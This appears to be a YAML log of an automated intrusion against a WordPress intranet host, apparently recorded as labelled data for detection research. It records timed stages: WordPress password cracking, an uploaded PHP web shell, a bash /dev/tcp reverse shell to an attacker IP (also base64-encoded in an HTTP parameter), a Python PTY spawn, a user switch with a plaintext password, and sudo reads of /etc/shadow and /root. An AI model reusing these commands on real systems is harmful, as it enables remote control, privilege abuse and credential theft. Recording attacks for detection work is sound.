
start: "2022-02-08T08:35:59.918Z"
stop: "2022-02-08T08:37:27.800Z"

vpn_disconnect: 
    start: "2022-02-08T08:37:25.489Z"
    stop: "2022-02-08T08:37:27.800Z"
wp_crack:
    start: "2022-02-08T07:57:06.675Z"
    stop: "2022-02-08T08:35:59.916Z"

reverse_shell:
    start: "2022-02-08T08:36:02.447Z"
    stop: "2022-02-08T08:36:28.937Z"
    web_shell: "https://intranet.mannsmith.harrison.com/wp-content/uploads/2022/02/yumzrshbwn-1644306962.5811.php"
    http_param: 
        name: "wp_meta"
        value: "WyJiYXNoIiwgIi1jIiwgIiAnMDwmMTk2O2V4ZWMgMTk2PD4vZGV2L3RjcC8xNzIuMjguMTkyLjI0Mi8xMTM0MTsgc2ggPCYxOTYgPiYxOTYgMj4mMTk2JyIsICImIl0="
    cmd: ["bash", "-c", " \u00270\u003c\u0026196;exec 196\u003c\u003e/dev/tcp/172.28.192.242/11341; sh \u003c\u0026196 \u003e\u0026196 2\u003e\u0026196\u0027", "\u0026"]
    listen_socket:
        ip: "::ffff:172.28.192.242"
        port: 11341
        scope_id: 0
        flowinfo: 0
    remote_socket:
        ip: "::ffff:172.28.192.4"
        port: 58450
        scope_id: 0
        flowinfo: 0

open_pty:
    start: "2022-02-08T08:36:37.168Z"
    stop: "2022-02-08T08:36:37.933Z"
    pty_cmd: python -c 'import pty; pty.spawn("/bin/bash")'

change_user:
    start: "2022-02-08T08:36:37.935Z"
    enter_password: "2022-02-08T08:36:38.055Z"
    stop: "2022-02-08T08:36:39.475Z"
    user: "jward"
    password: "tltUE4cB1X2V"


escalated_cmds:

    - id: "check_groups"
      start: "2022-02-08T08:36:49.084Z"
      stop: "2022-02-08T08:36:49.104Z"
      cmd: "groups"
      sudo: False

    - id: "check_netstat_nau"
      start: "2022-02-08T08:36:52.447Z"
      stop: "2022-02-08T08:36:52.484Z"
      cmd: "netstat -nau"
      sudo: False

    - id: "check_sudo"
      start: "2022-02-08T08:36:54.496Z"
      stop: "2022-02-08T08:36:54.682Z"
      cmd: "sudo -l"
      sudo: True

    - id: "read_shadow"
      start: "2022-02-08T08:36:57.286Z"
      stop: "2022-02-08T08:36:57.332Z"
      cmd: "sudo cat /etc/shadow"
      sudo: True

    - id: "list_root"
      start: "2022-02-08T08:36:59.727Z"
      stop: "2022-02-08T08:36:59.979Z"
      cmd: "sudo ls -laR /root/"
      sudo: True

    - id: "check_getent"
      start: "2022-02-08T08:37:03.330Z"
      stop: "2022-02-08T08:37:03.375Z"
      cmd: "getent passwd"
      sudo: False

    - id: "list_shadow"
      start: "2022-02-08T08:37:05.803Z"
      stop: "2022-02-08T08:37:05.822Z"
      cmd: "ls -ld /etc/shadow"
      sudo: False

    - id: "sudo_list_home"
      start: "2022-02-08T08:37:08.574Z"
      stop: "2022-02-08T08:37:08.618Z"
      cmd: "sudo ls -l /home"
      sudo: True

    - id: "check_w"
      start: "2022-02-08T08:37:10.544Z"
      stop: "2022-02-08T08:37:10.658Z"
      cmd: "w"
      sudo: False

    - id: "read_fstab"
      start: "2022-02-08T08:37:12.863Z"
      stop: "2022-02-08T08:37:12.890Z"
      cmd: "cat /etc/fstab"
      sudo: False

    - id: "list_ld_root"
      start: "2022-02-08T08:37:15.307Z"
      stop: "2022-02-08T08:37:15.319Z"
      cmd: "ls -ld /root"
      sudo: False

    - id: "check_ps_aux"
      start: "2022-02-08T08:37:17.587Z"
      stop: "2022-02-08T08:37:17.656Z"
      cmd: "ps -aux"
      sudo: False

    - id: "check_uname_ar"
      start: "2022-02-08T08:37:19.712Z"
      stop: "2022-02-08T08:37:19.752Z"
      cmd: "uname -ar"
      sudo: False

    - id: "check_ifconfig"
      start: "2022-02-08T08:37:22.747Z"
      stop: "2022-02-08T08:37:22.785Z"
      cmd: "ifconfig"
      sudo: False


    